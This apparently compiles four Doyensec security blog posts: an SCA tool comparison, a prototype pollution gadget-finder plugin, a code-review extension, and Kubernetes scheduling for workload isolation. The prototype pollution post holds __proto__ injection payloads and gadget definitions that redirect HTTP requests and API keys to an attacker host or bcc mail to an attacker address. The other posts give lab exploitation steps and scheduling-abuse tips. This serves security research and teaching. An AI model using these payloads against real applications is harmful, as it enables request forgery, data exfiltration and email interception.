A Look at Software Composition Analysis

Software Supply Chain as a factory assembly line

Background

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, using open source and off-the-shelf tools. Modern, comprehensive versions of these tools offer the capability to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).

Finding the right tool

Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications with cloud components, while the last is integrated directly into the GitHub(.com) environment. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of them with regard to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

It’s time to ignore most of your dependency alerts.

You will find the results of this latest analysis here on our research page. In that whitepaper, we describe the process used to develop the testing corpus and our methodology. In short, the aim was to determine which tool provides the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. We considered this the optimal real-world scenario for most security teams, since most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low-fidelity tools in the hope of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempt at implementing deployment blocking as a result of CI/CD testing is unlikely to tolerate more than a minimal number of false positives.

False Positive Rate

More to Come

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at info@doyensec.com.


Unveiling the Prototype Pollution Gadgets Finder

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what “sources” and “gadgets” are.

  • Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
    • Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
    • Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments that fail to validate the safety of the objects being merged or extended.
// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}
  • Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.
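To make the distinction concrete, here is a minimal, self-contained sketch (the runTask function and its shell option are hypothetical, purely for illustration) of how library code that reads an option it never sets can act as a gadget once the prototype has been polluted:

// Hypothetical library code: "shell" is never set on the options object,
// so the property lookup falls through to Object.prototype
function runTask(options = {}) {
    const shell = options.shell || '/bin/sh';
    console.log(`task would run with shell: ${shell}`);
}

// Attacker-controlled pollution (in a real attack this is reached through a
// vulnerable source, such as the merge() shown above)
Object.prototype.shell = '/tmp/malicious-binary';

runTask({}); // Outputs: task would run with shell: /tmp/malicious-binary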

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

  • PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.

  • On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burp Suite plugin for detecting gadgets in server-side prototype pollution: the Prototype Pollution Gadgets Finder, available on GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}

Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

Furthermore, all gadgets introduced by the plugin operate out-of-bounds (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited, once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.

Plugin Screenshot

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
  "payload": {"<parameter>": "<URL>"},
  "description": "<Description>",
  "null_payload": {"<parameter>": {}}
}
  • Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
  • Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
  • Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively “de-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

  • Vulnerable Code Example:
    app.get("/get-api-key", async (req, res) => {
      try {
          const instance = axios.create({baseURL: "https://doyensec.com"});
          const response = await instance.get("/?api-key=<API_KEY>");
      }
    });
    
  • Gadget Explanation: Manipulating the baseURL parameter redirects the application’s outgoing HTTP requests to an attacker-controlled domain, potentially enabling Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in rerouting outgoing HTTP requests through an attacker-controlled proxy. While Burp Collaborator cannot itself act as a proxy to capture or manipulate these requests, it does detect the DNS lookups initiated by the application. Observing DNS requests to a domain we control, triggered by poisoning the proxy configuration, shows that the application accepted the poisoned configuration and highlights the potential vulnerability without the need to observe proxy traffic directly. With the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to fully intercept and manipulate HTTP communications, demonstrating the vulnerability’s exploitability. A minimal demonstration sketch follows the gadget definitions below.

  • Gadget for Axios:
    {
      "payload": {"baseURL": "https://<URL>"},
      "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
      "null_payload": {"baseURL": {}}
    },
    {
      "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
      "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
      "null_payload": {"proxy": {}}
    }
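To illustrate why the baseURL gadget works, here is a minimal sketch (assuming a Node.js application with axios installed and an attacker-controlled collaborator domain; the pollution is simulated with a direct assignment):

const axios = require('axios');

// Simulated pollution; in a real attack this happens through the vulnerable source
Object.prototype.baseURL = 'https://attacker.example';

// The application never sets baseURL, so the new instance inherits the polluted value
const instance = axios.create({});

// The request is now routed to https://attacker.example/?api-key=<API_KEY>
instance.get('/?api-key=<API_KEY>').catch(() => {});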
    

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

  • Vulnerable Code Example:
    transporter.sendMail(mailOptions, (error, info) => {
      if (error) {
          res.status(500).send('500!');
      } else {
          res.send('200 OK');
      }
    });
    
  • Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communications. A minimal sketch follows the gadget definitions below.

  • Gadget for Nodemailer:
    {
      "payload": {"cc": "email@<URL>"},
      "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
      "null_payload": {"cc": {}}
    },
    {
      "payload": {"bcc": "email@<URL>"},
      "description": "Adds a BCC address in email libraries, similar to 'cc', for intercepting emails.",
      "null_payload": {"bcc": {}}
    }
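A minimal sketch of the same idea (the transport and addresses are illustrative; streamTransport is used so no mail is actually sent): because the application’s mail options never define bcc, the value inherited from the polluted prototype ends up in the generated envelope:

const nodemailer = require('nodemailer');

// Simulated pollution; in a real attack this happens through the vulnerable source
Object.prototype.bcc = 'attacker@attacker.example';

const transporter = nodemailer.createTransport({ streamTransport: true });

transporter.sendMail(
  { from: 'app@example.com', to: 'user@example.com', subject: 'Hi', text: 'Hello' },
  (error, info) => console.log(error || info.envelope) // envelope now also includes the bcc address
);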
    

Gadget Found

Our methodology emphasizes the importance of understanding library documentation and how optional parameters can be leveraged maliciously. We encourage the community to contribute by identifying new gadgets and sharing them. Visit our GitHub repository for a comprehensive installation guide and to start using the tool.


Introducing PoIEx - Points Of Intersection Explorer

We are releasing a previously internal-only tool that improves Infrastructure as Code (IaC) analysis and enhances Visual Studio Code, allowing real-time collaboration during manual code analysis activities. We’re excited to announce that PoIEx is now available on GitHub.

Nowadays, cloud-oriented solutions are no longer a buzzword; cloud providers offer increasingly intelligent infrastructure services, handling features ranging from simple object storage to complex tasks such as user authentication and identity and access management. With the growing complexity of cloud infrastructure, the interactions between application logic and infrastructure play an increasingly critical role in ensuring application security.

With many recent high-profile incidents resulting from an insecure combination of web and cloud-related technologies, focusing on the points where they meet is crucial for discovering new bugs.

PoIEx is a new Visual Studio Code extension that aids testers in analyzing interactions between code and infrastructure by enumerating, plotting and connecting the so-called Points of Intersection.

Introducing the Point of Intersection - A novel approach to IaC-App analysis

A Point of Intersection (PoI) marks where the code interacts with the underlying cloud infrastructure, revealing connections between the implemented logic and the Infrastructure as Code (IaC) defining the configuration of the involved cloud services.

Enumerating PoIs is crucial while performing manual reviews to find hybrid cloud-web vulnerabilities exploitable by tricking the application logic into abusing the underlying infrastructure service.

PoIEx identifies and visualizes PoIs, allowing security engineers and cloud security specialists to better understand and identify security vulnerabilities in cloud-oriented applications.

PoIEx: Enhancing VSCode to support Code Reviews

PoIEx scans the application code and the IaC definition at the same time, leveraging Semgrep and custom rulesets, finds code sections that are IaC-relevant, and visualizes results in a nice and user-friendly view. Engineers can navigate the infrastructure diagram and quickly jump to the relevant application code sections where the selected infrastructure resource is used.

Example infrastructure diagram generation and PoIs exploration

If you use VSCode to audit large codebases, you may have noticed that all of its features are tailored towards the needs of the developer community. At Doyensec, we have solved this issue with PoIEx. The extension enhances VSCode with the features required to efficiently perform code reviews, such as advanced collaboration capabilities, note taking via the VS Code Comments API, and Semgrep integration. This also allows it to be used as a standalone Semgrep and project collaboration tool, without any of its IaC-specific features.

At Doyensec, we use PoIEx as a collaboration and review-enhancement tool.
Below we introduce the non-IaC related features, along with our use cases.

✍️ Notes Taking As Organized Threads

PoIEx adds commenting capabilities to VSCode. Users can attach sticky notes to any code location without editing the codebase.

At Doyensec, we usually organize threads with a naming convention involving prefixes like: VULN, LEAD, TODO, etc. We have found that placing shared annotations directly on the codebase greatly improves efficiency when multiple testers are working on the same project.

Example notes usage with organized threads

In collaboration mode, members receive an interactive notification for every reply or thread creation, enabling real-time sync among the reviewers about leads, notes and vulnerabilities.

👨‍💻 PoIEx as a standalone Semgrep extension for VSCode

PoIEx also works as a standalone VSCode extension for Semgrep. It allows the user to scan the entire workspace and neatly presents Semgrep findings in the VSCode “Problems” tab.

Moreover, by right-clicking an issue, it is possible to apply a flag and update its status as ❌ false positive, 🔥 hot, or ✅ resolved. The status is synced in collaboration mode to avoid duplicating checks.

The extension settings allow the user to set up custom arguments for Semgrep. As an example, we currently use --config /path/to/your/custom-semgrep-rules --metrics off to turn off metrics and set it to use our custom rules.

The scan can be started from the extension side-menu and the results are explorable from the VS Code problems sub-menu. Users can use the built-in search functionality in a smart way to find interesting leads.

Example Semgrep results and listed PoIs exploration with emoji flagging

🎯 Project-oriented Design

PoIEx allows for real-time synchronization of findings and comments with other users. When using collaboration features, a MongoDB instance needs to be shared across all collaborators of the team.

The project-oriented design allows us to map projects and share an encryption key with the testers assigned to a specific activity. This design feature ensures that sensitive data is encrypted at rest.

Comments and scan results are synced to a MongoDB instance, while the codebase remains local; each reviewer must work on the same version of it.

A Real-World Analysis Example - Solving Tidbits Ep.1 With PoIEx

In case you are not familiar with it, CloudSec Tidbits is our blogpost series showcasing interesting real-world bugs found by Doyensec during cloud security testing activities. The blog posts & labs can be found in this repository.

Episode 1 describes a specific type of vulnerability affecting the application logic when user input is used to instantiate the AWS SDK client. Without proper checks, a user may be able to force the app to use the instance role, instead of external credentials, to interact with the AWS service. Depending on the functionality, such a flaw could allow unwanted actions against the internal infrastructure.

Below, we cover how the issue can be identified during a code review as soon as the codebase is opened and explored with PoIEx.

Once the codebase for Lab 1 is downloaded and opened in VS Code, use PoIEx to run Semgrep and generate the infrastructure diagram by selecting the main.tf file. The result should be similar to the following.

The notifications on aws_s3_bucket.data_internal represent two findings for that bucket. By clicking on it, a new tab is opened to visualize them.

The first group contains PoIs and Semgrep findings, while the second group contains the IaC definition of the clicked entity.

In this case, we see that there is an S3 PoI at app/web.go:52. Once clicked, we are redirected to the GetListObjects function defined at web.go#L50. While it just lists the files in an S3 bucket, both the SDK client config and the bucket name are passed as parameters in its signature.

A quick search for its usages shows the vulnerable code:

// AWS config initialization
aws_config := &aws.Config{}

if len(imptdata.AccessKey) == 0 || len(imptdata.SecretKey) == 0 {
	fmt.Println("Using nil value for Credentials")
	aws_config.Credentials = nil
} else {
	fmt.Println("Using NewStaticCredentials")
	aws_config.Credentials = credentials.NewStaticCredentials(imptdata.AccessKey, imptdata.SecretKey, "")
}
// List of all objects
allObjects, err := GetListObjects(session_init, aws_config, *aws.String(imptdata.BucketName))

If aws_config.Credentials is set to nil because of a missing key/secret in the input, the default credentials provider chain is used and the instance’s IAM role is assumed. In that case, the automatically retrieved credentials have full access to internal S3 buckets. Quickly jump to the TF definition from the S3 bucket results tab.

After the listing, the DownloadContent function is executed (at web.go line 129) and the bucket’s contents are exposed to the user.

At this point, the reviewer knows that if the function is called with an empty AWS Key or Secret, the import data functionality will end up downloading the content with the instance’s role, hence allowing internal bucket names as input.

To exploit the vulnerability, hit the endpoint /importData with empty credentials and the name of an internal bucket (solution at the beginning of Cloudsec Tidbits episode 2).

Stay Tuned!

This project was made with love on the Doyensec Research Island by Michele Lizzit for his master’s thesis at ETH Zurich, under the mentorship of Francesco Lacerenza.

Check out PoIEx! Install the latest release from GitHub and contribute with a star, bug reports or suggestions.


Kubernetes Scheduling And Secure Design

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns. Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, admission controllers, network policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced. By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

Attackers on a compromised pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following methods of applying a scheduling strategy will be discussed:

  • nodeSelector
  • nodeName
  • Affinity & Anti-affinity
  • Inter-pod Affinity and Anti-affinity
  • Taints and Tolerations
  • Pod Topology Spread Constraints
  • Custom schedulers

Mechanisms for Workload Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, multiple applications with different authorization levels may end up with privileged pods sharing a node with pods that mount PII data or carry a different security risk level.

1. nodeSelector

Among the available constraints, it is the simplest one: it works by simply specifying the target node labels inside the pod specification.

Example pod spec

apiVersion: v1
kind: Pod
metadata:
  name: nodeselector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on nodes satisfying all of them.

While it is very useful in low-complexity environments, it could easily become a bottleneck stopping executions if many selectors are specified and not satisfied by nodes. Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.

2. nodeName

If the nodeName field in the spec is set, the kube-scheduler skips the pod and the kubelet on the named node attempts to run it.

In that sense, nodeName overrides other scheduling rules (e.g., nodeSelector, affinity, anti-affinity, etc.) since the scheduling decision is pre-defined.

Example pod spec

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

  • The pod will not run if the named node is not running or if it does not have the resources to host it
  • Cloud environments like AWS’s EKS come with unpredictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: In practice, such an approach forfeits the computational-efficiency benefits of the scheduler and should only be applied to small, easy-to-manage groups of critical workloads.

3. Affinity & Anti-affinity

The NodeAffinity feature makes it possible to specify rules for pod scheduling based on node characteristics or labels. These rules can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either “preferred” (soft) or “required” (hard). A rule set as preferredDuringSchedulingIgnoredDuringExecution is a soft rule: the scheduler will try to adhere to it, but may not always do so, especially if adhering would make scheduling impossible or challenging. A rule set as requiredDuringSchedulingIgnoredDuringExecution is a hard rule: the scheduler will not schedule the pod unless the condition is met, which can leave the pod unscheduled (pending) if the condition isn’t satisfied.

In particular, anti-affinity rules can be leveraged to keep critical workloads from sharing a node with non-critical ones. By doing so, the loss of computational optimization does not affect the entire node pool, but only the few instances that host business-critical units.

Example of node affinity

apiVersion: v1
kind: Pod
metadata:
  name: node-affinity-example
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - weight: 1
        preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            - segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

The node is preferred to be in a specific network segment (by label) and is required to have a workloadtype of either p0wload or p1wload (a custom strategy).

Multiple operators are available, and NotIn and DoesNotExist are the ones usable to obtain node anti-affinity. From a security standpoint, only hard rules requiring the conditions to be respected matter. The preferredDuringSchedulingIgnoredDuringExecution configuration should only be used for computational preferences that cannot affect the security posture of the cluster.

4. Inter-pod Affinity and Anti-affinity

Inter-pod affinity and anti-affinity constrain which nodes pods can be scheduled on, based on the labels of pods already running on those nodes.
As specified in the Kubernetes documentation:

“Inter-pod affinity and anti-affinity rules take the form “this pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more pods that meet rule Y”, where X is a topology domain like node, rack, cloud provider zone or region, or similar and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase
      topologyKey: kubernetes.io/hostname

In the podAntiAffinity case above, the pod will never be scheduled on a node (the topology domain selected by topologyKey) where a pod labeled app: testdatabase is already running.

It fits designs where certain pods should be scheduled together, or where the system must ensure that certain pods are never scheduled together. In particular, inter-pod rules allow engineers to define additional constraints within the same execution context without creating further segmentation in terms of node groups. Nevertheless, complex affinity rules could leave pods stuck in a pending state.

5. Taints and Tolerations

Taints are the opposite of node affinity: they allow a node to repel a set of pods that do not match certain tolerations. They are applied to a node and make it repel pods unless those pods explicitly tolerate the taints.

Tolerations are applied to pods and allow the scheduler to place them on nodes with matching taints. It should be highlighted that while tolerations allow scheduling, placement on the tainted nodes is not guaranteed.

Each taint also defines an effect: NoExecute (evicts running pods that do not tolerate it), NoSchedule (hard rule), or PreferNoSchedule (soft rule). The approach is ideal for environments where strong isolation of workloads is required. Moreover, it allows the creation of custom node-selection rules that are not based solely on labels, leaving little room for flexibility. A minimal example follows.
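As a minimal sketch (the node name and the dedicated=critical taint are illustrative), a node can be tainted so that it repels every pod that does not explicitly tolerate the taint:

kubectl taint nodes node-critical-workload dedicated=critical:NoSchedule

A pod meant to run on that node then declares a matching toleration:

apiVersion: v1
kind: Pod
metadata:
  name: critical-pod
spec:
  containers:
  - name: app
    image: nginx:latest
  tolerations:
  - key: "dedicated"
    operator: "Equal"
    value: "critical"
    effect: "NoSchedule"

Note that the toleration only allows scheduling on the tainted node; pairing it with a nodeSelector or node affinity rule is what actually steers the pod there.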

6. Pod Topology Spread Constraints

You can use topology spread constraints to control how pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.
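A brief illustrative sketch (the app: web label is hypothetical): the constraint below asks the scheduler to keep matching pods evenly distributed per node, refusing to schedule a pod that would skew the distribution by more than one:

apiVersion: v1
kind: Pod
metadata:
  name: spread-example
  labels:
    app: web
spec:
  topologySpreadConstraints:
  - maxSkew: 1
    topologyKey: kubernetes.io/hostname
    whenUnsatisfiable: DoNotSchedule
    labelSelector:
      matchLabels:
        app: web
  containers:
  - name: web
    image: nginx:latest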

7. Not Satisfied? Custom Scheduler to the Rescue

Kubernetes by default uses the kube-scheduler, which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers many options, there might be specific security requirements that it does not know about. Writing a custom scheduler allows an organization to apply risk-based scheduling, for example to avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

  • Watches for unscheduled pods
  • Implements a scheduling algorithm to decide on which node the pod should run
  • Communicates the decision to the Kubernetes API server.

Some examples of a custom scheduler that can be adapted for this can be found at the following GH repositories: kubernetes-sigs/scheduler-plugins or onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics - Mateo Burillo, Sysdig. As mentioned in the talk, this is not for the faint of heart because of the complexity involved, and you might be better off sticking with the default scheduler unless you were already planning to build one.

Offensive Tips: Scheduling Policies are like Magnets

As described, scheduling policies can be used to attract pods to, or repel them from, specific groups of nodes.

While a proper strategy reduces the blast radius of a compromised pod, there are still some aspects to take care of from the attacker’s perspective. In specific cases, the implemented mechanisms could be used to:

  • Attract critical pods - A compromised node, or a role able to edit node metadata, could be abused to attract pods of interest to the attacker by manipulating the labels of a controlled node.
    • Carefully review roles and internal processes that could be abused to edit node metadata. Verify whether internal threat actors could exploit the attraction by influencing or changing labels and taints.
  • Avoid rejection on critical nodes - If users are allowed to submit pod specs, or have indirect control over how they are dynamically built, the scheduling sections of the spec could be abused. An attacker able to submit pod specs could use scheduling preferences to jump onto a critical node.
    • Always review the scheduling strategy to find the options that allow pods to land on nodes hosting critical workloads. Verify whether user-controlled flows allow adding them, or whether the logic could be abused by some internal flow.
  • Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied strategy could allow a privileged attacker to craft pods to block legitimate workloads at the scheduling decision.
    • Look for a potential mix of labels usable to lock the scheduling on a node

Bonus Section: Node Labels Security

Normally, the kubelet is still able to modify the labels of its own node, potentially allowing a compromised node to tamper with its labels to trick the scheduler, as described above.

A security measure can be applied with the NodeRestriction admission plugin, which denies label edits from the kubelet when the label uses the node-restriction.kubernetes.io/ prefix, as sketched below.
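As a sketch (the node and label names are illustrative, and the flag is only relevant on self-managed control planes), the plugin is enabled on the API server and the protected label is then applied from an administrative credential:

# Enable the admission plugin on the API server
kube-apiserver --enable-admission-plugins=NodeRestriction

# Label the node from an admin context; kubelets cannot add or modify
# labels under the node-restriction.kubernetes.io/ prefix
kubectl label nodes node-critical-workload node-restriction.kubernetes.io/pool=critical

Workloads can then target the node with a nodeSelector or affinity rule on node-restriction.kubernetes.io/pool: critical, knowing a compromised kubelet cannot grant itself that label.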

Wrap-up: Time to Make the Scheduling Decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, that design would not exploit Kubernetes’ capability to optimize computation.

The following examples represent some trade-off choices:

  • Isolate critical namespaces/workloads on their own node group
  • Reserve a node for critical pods of each namespace
  • Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads. Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risks:

  • Different teams, different trust level
    It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training or access. This diversity can introduce varying levels of risks.

  • Data being processed or stored
    Some pods may require mounting customer data or holding persistent secrets to perform their tasks. Sharing a node with less hardened workloads may put that data at risk.

  • Exposed network services on the same node
    Any pod that exposes a network service increases its attack surface. Pods handling external-facing requests suffer from this exposure and are more at risk of compromise.

  • A pod’s privileges and capabilities, or its assigned risk
    Some workloads may need some privileges to work or may run code that by its very nature processes potentially unsafe content or third-party vendor code. All these factors can contribute to increasing a workload’s assigned risk.

Once the set of risks within the environment is identified, decide the isolation level for teams/data/network traffic/capabilities. Grouping them, if they are part of the same process, could do the trick.

At that point, the number of workloads in each isolation group can be evaluated and addressed by mixing the scheduling strategies according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.